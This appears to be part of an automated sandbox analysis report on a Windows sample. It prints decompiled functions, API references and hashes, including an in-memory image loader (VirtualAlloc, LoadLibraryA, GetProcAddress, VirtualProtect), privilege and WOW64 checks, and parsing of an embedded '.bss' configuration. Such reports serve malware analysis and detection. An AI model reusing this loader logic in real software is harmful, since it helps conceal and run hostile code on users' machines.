                                      • Opcode Fuzzy Hash: b3805b4b3436125417399c6f6ab153c565ce5765d4b2e0dfda77009439d19a91
                                      • Instruction Fuzzy Hash: AD01D628104A445EEB287B78A8862EA3B9A9F0F348F64345AE182C7312C71E0C578A5D
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043EBD4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1238 43ebd4-43ebf8 GetModuleHandleA GetProcAddress 1239 43ec02-43ec07 1238->1239 1240 43ebfa-43ec00 IsWow64Process 1238->1240 1240->1239
                                      C-Code - Quality: 40%
                                      			E0043EBD4(intOrPtr* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t6;
				intOrPtr* _t12;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t12 = __ecx;
				_t6 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t6 != 0) {
					 *_t6( *_t12,  &_v8); // executed
				}
				return _v8;
			}






                                      0x0043ebd7
                                      0x0043ebd8
                                      0x0043ebe7
                                      0x0043ebf0
                                      0x0043ebf8
                                      0x0043ec00
                                      0x0043ec00
                                      0x0043ec07

                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0043DC08,?,?,00432BBD,?,00442608,?,?,00000000,?), ref: 0043EBE9
                                      • GetProcAddress.KERNEL32(00000000,?,0043DC08,?,?,00432BBD,?,00442608,?,?,00000000,?), ref: 0043EBF0
                                      • IsWow64Process.KERNEL32(?,00000000,?,0043DC08,?,?,00432BBD,?,00442608,?,?,00000000,?), ref: 0043EC00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProcProcessWow64
                                      • String ID: IsWow64Process$kernel32
                                      • API String ID: 1818662866-3789238822
                                      • Opcode ID: 0a251a2f8c94d37595d48560dd08c74086abe35261c6b1a19491beee3e02f12f
                                      • Instruction ID: e51506f455c3203213d13555d93e4d5a1a11277cce30c91eef181f2d1b7eddff
                                      • Opcode Fuzzy Hash: 0a251a2f8c94d37595d48560dd08c74086abe35261c6b1a19491beee3e02f12f
                                      • Instruction Fuzzy Hash: B7E08C36600204FBEB24DB91DD0AB8E7ABCEB45750F200559B902E2080DAB8EE00C698
                                      Uniqueness

                                      Uniqueness Score: 2.28%

                                      Function 0041002D, Relevance: 7.9, APIs: 5, Instructions: 392memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1241 41002d-41009e call 410467 * 6 1254 4100a0-4100a2 1241->1254 1255 4100a7-4100b0 1241->1255 1256 41045f-410466 1254->1256 1255->1254 1257 4100b2-4100b6 1255->1257 1257->1254 1258 4100b8-4100c2 1257->1258 1259 4100c4-4100c7 1258->1259 1260 4100e6-410107 GetNativeSystemInfo 1258->1260 1261 4100c9-4100cf 1259->1261 1260->1254 1262 410109-410133 VirtualAlloc 1260->1262 1265 4100d1-4100d4 1261->1265 1266 4100d6 1261->1266 1263 410135-41013d 1262->1263 1264 41016c-410176 1262->1264 1267 41013f-410142 1263->1267 1268 4101b0-4101c1 1264->1268 1269 410178-41017d 1264->1269 1270 4100d9-4100e4 1265->1270 1266->1270 1273 410144-41014c 1267->1273 1274 41015d-41015f 1267->1274 1271 410240-41024c 1268->1271 1272 4101c3-4101dd LoadLibraryA 1268->1272 1275 410181-410194 1269->1275 1270->1260 1270->1261 1280 410252-410269 1271->1280 1281 4102fc-410306 1271->1281 1276 4101df 1272->1276 1277 41022e-41023a 1272->1277 1273->1274 1278 41014e-410151 1273->1278 1279 410161-410166 1274->1279 1282 4101a5-4101aa 1275->1282 1283 410196-41019f 1275->1283 1284 4101e3-4101e7 1276->1284 1277->1272 1288 41023c 1277->1288 1285 410153-410156 1278->1285 1286 410158-41015b 1278->1286 1279->1267 1287 410168 1279->1287 1280->1281 1291 41026f-41027f 1280->1291 1289 4103c3-4103d8 call 440e1e 1281->1289 1290 41030c-410313 1281->1290 1282->1275 1293 4101ac 1282->1293 1283->1283 1292 4101a1 1283->1292 1294 410207-410211 GetProcAddress 1284->1294 1295 4101e9 1284->1295 1285->1274 1285->1286 1286->1279 1287->1264 1288->1271 1313 4103da-4103df 1289->1313 1296 410315-41031e 1290->1296 1297 4102e1-4102f2 1291->1297 1298 410281-410285 1291->1298 1292->1282 1293->1268 1301 410213-410228 1294->1301 1295->1294 1300 4101eb-410205 1295->1300 1303 410324-41033e 1296->1303 1304 4103b8-4103bd 1296->1304 1297->1291 1302 4102f8 1297->1302 1305 410286-410295 1298->1305 1300->1301 1301->1284 1308 41022a 1301->1308 1302->1281 1309 410340-410342 1303->1309 1310 410358-41035a 1303->1310 1304->1289 1304->1296 1306 410297-41029b 1305->1306 1307 41029d-4102a6 1305->1307 1306->1307 1311 4102a8-4102ad 1306->1311 1312 4102cf-4102d3 1307->1312 1308->1277 1316 410344-410349 1309->1316 1317 41034b-41034e 1309->1317 1314 410373-410375 1310->1314 1315 41035c-41035e 1310->1315 1319 4102c0-4102c3 1311->1319 1320 4102af-4102be 1311->1320 1312->1305 1325 4102d5-4102dd 1312->1325 1321 4103e1-4103e5 1313->1321 1322 41045d 1313->1322 1326 410377 1314->1326 1327 41037c-410381 1314->1327 1323 410360-410362 1315->1323 1324 410364-410366 1315->1324 1318 410350-410356 1316->1318 1317->1318 1328 410384-4103ae VirtualProtect 1318->1328 1319->1312 1329 4102c5-4102cb 1319->1329 1320->1312 1321->1322 1330 4103e7-4103f1 1321->1330 1322->1256 1331 410379-41037a 1323->1331 1324->1314 1332 410368-41036a 1324->1332 1325->1297 1326->1331 1327->1328 1328->1254 1335 4103b4 1328->1335 1329->1312 1330->1322 1333 4103f3-4103f7 1330->1333 1331->1328 1332->1328 1334 41036c-410371 1332->1334 1333->1322 1336 4103f9-41040a 1333->1336 1334->1328 1335->1304 1336->1322 1337 41040c-410411 1336->1337 1338 410413-410420 1337->1338 1338->1338 1339 410422-410426 1338->1339 1340 410428-41043a 1339->1340 1341 41043e-410444 1339->1341 1340->1337 1342 41043c 1340->1342 1341->1322 1343 410446-41045c 1341->1343 1342->1322 1343->1322
                                      APIs
                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,00410005), ref: 004100EB
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,00410005), ref: 00410113
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocInfoNativeSystemVirtual
                                      • String ID:
                                      • API String ID: 2032221330-0
                                      • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                      • Instruction ID: 424d0fb78361447582b65204010cf142d8cbab5b758a1d11f1574a3a191eab5d
                                      • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                      • Instruction Fuzzy Hash: E5E1B071A043069FDB24DF19C8847AAB7E0BF94308F18456EE8959B341E7B8ECC5CB95
                                      Uniqueness

                                      Uniqueness Score: 2.84%

                                      Function 0043DB97, Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1346 43db97-43dbb8 GetCurrentProcess OpenProcessToken 1347 43dbda-43dbde 1346->1347 1348 43dbba-43dbd6 GetTokenInformation 1346->1348 1349 43dbe0-43dbe3 CloseHandle 1347->1349 1350 43dbe9-43dbf2 1347->1350 1348->1347 1349->1350
                                      C-Code - Quality: 100%
                                      			E0043DB97() {
				void* _v8;
				long _v12;
				void _v16;
				long _t21;
				void* _t22;

				_t22 = 0;
				_v8 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_t21 = 4;
					_v12 = _t21;
					GetTokenInformation(_v8, 0x14,  &_v16, _t21,  &_v12); // executed
					_t22 =  !=  ? _v16 : 0;
				}
				if(_v8 != 0) {
					CloseHandle(_v8); // executed
				}
				return 0 | _t22 != 0x00000000;
			}








                                      0x0043dba1
                                      0x0043dba6
                                      0x0043dbb8
                                      0x0043dbbc
                                      0x0043dbc0
                                      0x0043dbce
                                      0x0043dbd6
                                      0x0043dbd6
                                      0x0043dbde
                                      0x0043dbe3
                                      0x0043dbe3
                                      0x0043dbf2

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0043DBA9
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0043DBB0
                                      • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0043DBCE
                                      • CloseHandle.KERNEL32(00000000), ref: 0043DBE3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                      • String ID:
                                      • API String ID: 215268677-0
                                      • Opcode ID: 464588851dbd46035742a9ce994544ebea6c51308f75a1e164b26573db2b0244
                                      • Instruction ID: 4c94e2b01d42d43fe2c2185eede2d7187b662b4eef76c32e058b9fe322327e88
                                      • Opcode Fuzzy Hash: 464588851dbd46035742a9ce994544ebea6c51308f75a1e164b26573db2b0244
                                      • Instruction Fuzzy Hash: 14F0EC75D00218FBDB119BA09D09ADEBBB8EF09701F514065AA01A61A0D7749E48DA94
                                      Uniqueness

                                      Uniqueness Score: 0.13%

                                      Function 00CC8FDB, Relevance: 4.7, APIs: 3, Instructions: 168COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1494 cc8fdb-cc9002 call cc8b66 1497 cc9004-cc900d call cc8bd9 1494->1497 1498 cc9012-cc9019 1494->1498 1505 cc91c5-cc91d4 call cc1c5e 1497->1505 1500 cc901c-cc9022 1498->1500 1502 cc911e-cc9137 call cc1f70 1500->1502 1503 cc9028-cc9034 1500->1503 1514 cc913d-cc9142 1502->1514 1503->1500 1506 cc9036-cc903c 1503->1506 1507 cc9116-cc9119 1506->1507 1508 cc9042-cc9048 1506->1508 1513 cc91c4 1507->1513 1511 cc9058-cc9064 IsValidCodePage 1508->1511 1512 cc904a-cc9052 GetACP 1508->1512 1511->1507 1516 cc906a-cc9077 GetCPInfo 1511->1516 1512->1507 1512->1511 1513->1505 1517 cc9144-cc9149 1514->1517 1518 cc9176-cc917d 1514->1518 1519 cc907d-cc909c call cc1f70 1516->1519 1520 cc9103-cc9109 1516->1520 1517->1518 1522 cc914b-cc9151 1517->1522 1518->1514 1521 cc917f-cc91a9 call cc8b28 1518->1521 1533 cc909e-cc90a5 1519->1533 1534 cc90f3 1519->1534 1520->1507 1524 cc910b-cc9111 call cc8bd9 1520->1524 1536 cc91aa-cc91b9 1521->1536 1526 cc916a-cc916c 1522->1526 1540 cc91c1-cc91c2 1524->1540 1527 cc916e-cc9174 1526->1527 1528 cc9153-cc9159 1526->1528 1527->1517 1527->1518 1528->1527 1532 cc915b-cc9166 1528->1532 1532->1526 1538 cc90c8-cc90cb 1533->1538 1539 cc90a7-cc90ac 1533->1539 1537 cc90f6-cc90fe 1534->1537 1536->1536 1541 cc91bb-cc91bc call cc8c3e 1536->1541 1537->1541 1544 cc90d0-cc90d7 1538->1544 1539->1538 1542 cc90ae-cc90b4 1539->1542 1540->1513 1541->1540 1545 cc90bc-cc90be 1542->1545 1544->1544 1546 cc90d9-cc90f1 call cc8b28 1544->1546 1548 cc90b6-cc90bb 1545->1548 1549 cc90c0-cc90c6 1545->1549 1546->1537 1548->1545 1549->1538 1549->1539
                                      APIs
                                        • Part of subcall function 00CC8B66: GetOEMCP.KERNEL32(00000000,00CC8DED,?,00CC4B35,00D92144,00D92144,00CC4B35), ref: 00CC8B91
                                      • GetACP.KERNEL32(00000000,FFF475FF,?,?,?,00CC8E34,?,00000000,?,?,?,?,?,?,00D92144,00CC4B35), ref: 00CC904A
                                      • IsValidCodePage.KERNEL32(-00000030,00000000,FFF475FF,?,?,?,00CC8E34,?,00000000,?,?,?,?,?,?,00D92144), ref: 00CC905C
                                      • GetCPInfo.KERNEL32(00000000,00CC8E34,?,?,00CC8E34,?,00000000,?,?,?,?,?,?,00D92144,00CC4B35), ref: 00CC906F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: CodeInfoPageValid
                                      • String ID:
                                      • API String ID: 546120528-0
                                      • Opcode ID: 7fa003f0ab215efaff022a8cecde3f76a44ce9f64d6d32a53bc9d62c97b175c0
                                      • Instruction ID: 635a10c6e0c62211e5d3810b4b6053ffdd756277970207864c5256f8a1f4c43d
                                      • Opcode Fuzzy Hash: 7fa003f0ab215efaff022a8cecde3f76a44ce9f64d6d32a53bc9d62c97b175c0
                                      • Instruction Fuzzy Hash: B15155719003469FDB208F66C88EFBFBBB5EF05300F18406ED4A68B152D7359A459B91
                                      Uniqueness

                                      Uniqueness Score: 2.59%

                                      Function 00CC8C3E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,?), ref: 00CC8C63
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: Info
                                      • String ID:
                                      • API String ID: 1807457897-3916222277
                                      • Opcode ID: 6f2823c7fa8bfb267a178d5602ca2b98c734c27e954dbc690dd2a60f20d8ed0d
                                      • Instruction ID: ebc5e758f70b53143c114e1614cf5c6e2082e52e63c22d79647911a9f448eba6
                                      • Opcode Fuzzy Hash: 6f2823c7fa8bfb267a178d5602ca2b98c734c27e954dbc690dd2a60f20d8ed0d
                                      • Instruction Fuzzy Hash: D04125B05043889ADF228E25CC84FFBBBA9EB55704F1404EDE59A86182D635AE499F60
                                      Uniqueness

                                      Uniqueness Score: 0.05%

                                      Function 00CC65F4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00CC663F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: CountCriticalInitializeSectionSpin
                                      • String ID: InitializeCriticalSectionEx
                                      • API String ID: 2593887523-3084827643
                                      • Opcode ID: 64b709466c9193492a36f763d1be78b7964447ad9fc1555b37430d01af4d637a
                                      • Instruction ID: bd5fd8bc417757fb5eae70d52a6d4db0d26da6329e4de6aac72bc6c0202af7c7
                                      • Opcode Fuzzy Hash: 64b709466c9193492a36f763d1be78b7964447ad9fc1555b37430d01af4d637a
                                      • Instruction Fuzzy Hash: 69F0B435640288BBCB155F51DC05FAEBF65EF04720B004168FC191B160DF725E11ABC0
                                      Uniqueness

                                      Uniqueness Score: 0.05%

                                      Function 00CC6499, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: Alloc
                                      • String ID: FlsAlloc
                                      • API String ID: 2773662609-671089009
                                      • Opcode ID: 616f264568251ea57483094537e6d6c583022a39d827c00a37e323699ba805d3
                                      • Instruction ID: 6ae2c782bed3d83e088ed3c9a15a5a8fadd9c6b05d0a0d47c8d858b8572f3125
                                      • Opcode Fuzzy Hash: 616f264568251ea57483094537e6d6c583022a39d827c00a37e323699ba805d3
                                      • Instruction Fuzzy Hash: 67E0E531A81398778319EB62DD06F7EBB94CB14721B0002ACFC095B290CE656F0196D5
                                      Uniqueness

                                      Uniqueness Score: 0.07%

                                      Function 00CC249C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • try_get_function.LIBVCRUNTIME ref: 00CC24B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: try_get_function
                                      • String ID: FlsAlloc
                                      • API String ID: 2742660187-671089009
                                      • Opcode ID: 0e2b85ffe9c88bb52ac6df2e7d79669aed979359fdaa5f980fe315520c4804b5
                                      • Instruction ID: ba4d82dbc84e4765e4a96c504b0d609dc3d18d3f89efd1675317f92bb20d752b
                                      • Opcode Fuzzy Hash: 0e2b85ffe9c88bb52ac6df2e7d79669aed979359fdaa5f980fe315520c4804b5
                                      • Instruction Fuzzy Hash: A3D05B32BC13A863C5192696BC06F9D7A4CCB00BB3F0400F1FB0C5557099994D105AD1
                                      Uniqueness

                                      Uniqueness Score: 0.35%

                                      Function 004355A0, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 154sleepUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004355A0(char __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v24;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v76;
				char _v100;
				char _v108;
				char _v148;
				void* _t83;
				void* _t94;
				void* _t102;
				void* _t106;
				intOrPtr* _t126;
				char _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr* _t188;
				void* _t189;

				_t189 = __eflags;
				_t175 = __ecx;
				_v8 = __ecx;
				Sleep(0x1f4); // executed
				E0043E3ED( &_v100, _t189);
				E0043E2E4( &_v100, E0043FBFC()); // executed
				_t83 = E004331EC( &_v12, ".bss"); // executed
				E0043E257( &_v100,  &_v148, _t83); // executed
				E00435A2D(_v12);
				E00432E79( &_v16,  &_v108);
				E00432CCC(_t175 + 0x44,  &_v16);
				E00432E66( &_v16);
				E004354F2(_t175,  &_v24);
				_t126 = _v24;
				_t184 =  *_t126;
				_t94 = E0043FC1E( &_v12, _t126 + 4, _t184); // executed
				E00433264(_t175 + 0x10, _t94); // executed
				E00435A2D(_v12);
				_t176 = _t184 + 4;
				 *((intOrPtr*)(_v8 + 0x14)) =  *((intOrPtr*)(_t126 + _t176));
				_t185 =  *((intOrPtr*)(_t126 + _t176 + 4));
				_t177 = _t176 + 8;
				E00433264(_v8 + 0x28, E0043FC1E( &_v12, _t126 + _t177, _t185));
				E00435A2D(_v12);
				_t178 = _t177 + _t185;
				 *((intOrPtr*)(_v8 + 0x18)) =  *((char*)(_t126 + _t178));
				_t186 =  *((intOrPtr*)(_t126 + _t178 + 1));
				_t179 = _t178 + 5;
				_t102 = E0043FC1E( &_v12, _t126 + _t179, _t186); // executed
				E00433264(_v8 + 0x1c, _t102); // executed
				E00435A2D(_v12);
				_t180 = _t179 + _t186;
				 *((intOrPtr*)(_v8 + 0x20)) =  *((char*)(_t126 + _t180));
				_t187 =  *((intOrPtr*)(_t126 + _t180 + 1));
				_t181 = _t180 + 5;
				_t106 = E0043FC1E( &_v12, _t126 + _t181, _t187); // executed
				E00433264(_v8 + 0x24, _t106); // executed
				E00435A2D(_v12);
				_t182 = _t181 + _t187;
				_t188 = _v8;
				 *((intOrPtr*)(_t188 + 0x2c)) =  *((intOrPtr*)(_t126 + _t182));
				 *((intOrPtr*)(_t188 + 0x34)) =  *((char*)(_t126 + _t182 + 4));
				 *((intOrPtr*)(_t188 + 0x38)) =  *((char*)(_t126 + _t182 + 5));
				 *((intOrPtr*)(_t188 + 0x3c)) =  *((char*)(_t126 + _t182 + 6));
				 *((intOrPtr*)(_t188 + 0x40)) =  *((char*)(_t126 + _t182 + 7));
				E0043FC1E( &_v8, _t126 + 4 + _t182 + 8,  *((intOrPtr*)(_t126 + _t182 + 8))); // executed
				E00433264(_t188 + 0x30,  &_v8); // executed
				 *_t188 = 1;
				 *((intOrPtr*)(_t188 + 4)) = 1;
				E00435A2D(_v8);
				E00432E66( &_v24);
				E00432E66( &_v108);
				_t165 = _v56;
				if(_v56 != 0) {
					E00431DB4(_t165, _t165);
				}
				_v56 = 0;
				_v48 = 0;
				_v52 = 0;
				E00432E66( &_v76);
				return E0043DE8B( &_v100, 0);
			}

































                                      0x004355a0
                                      0x004355ac
                                      0x004355b3
                                      0x004355b6
                                      0x004355bf
                                      0x004355cd
                                      0x004355da
                                      0x004355ea
                                      0x004355f2
                                      0x004355fe
                                      0x0043560a
                                      0x00435612
                                      0x0043561d
                                      0x00435622
                                      0x00435628
                                      0x0043562e
                                      0x00435638
                                      0x00435640
                                      0x00435648
                                      0x0043564e
                                      0x00435654
                                      0x00435658
                                      0x0043566c
                                      0x00435674
                                      0x0043567c
                                      0x00435682
                                      0x00435688
                                      0x0043568c
                                      0x00435693
                                      0x004356a0
                                      0x004356a8
                                      0x004356b0
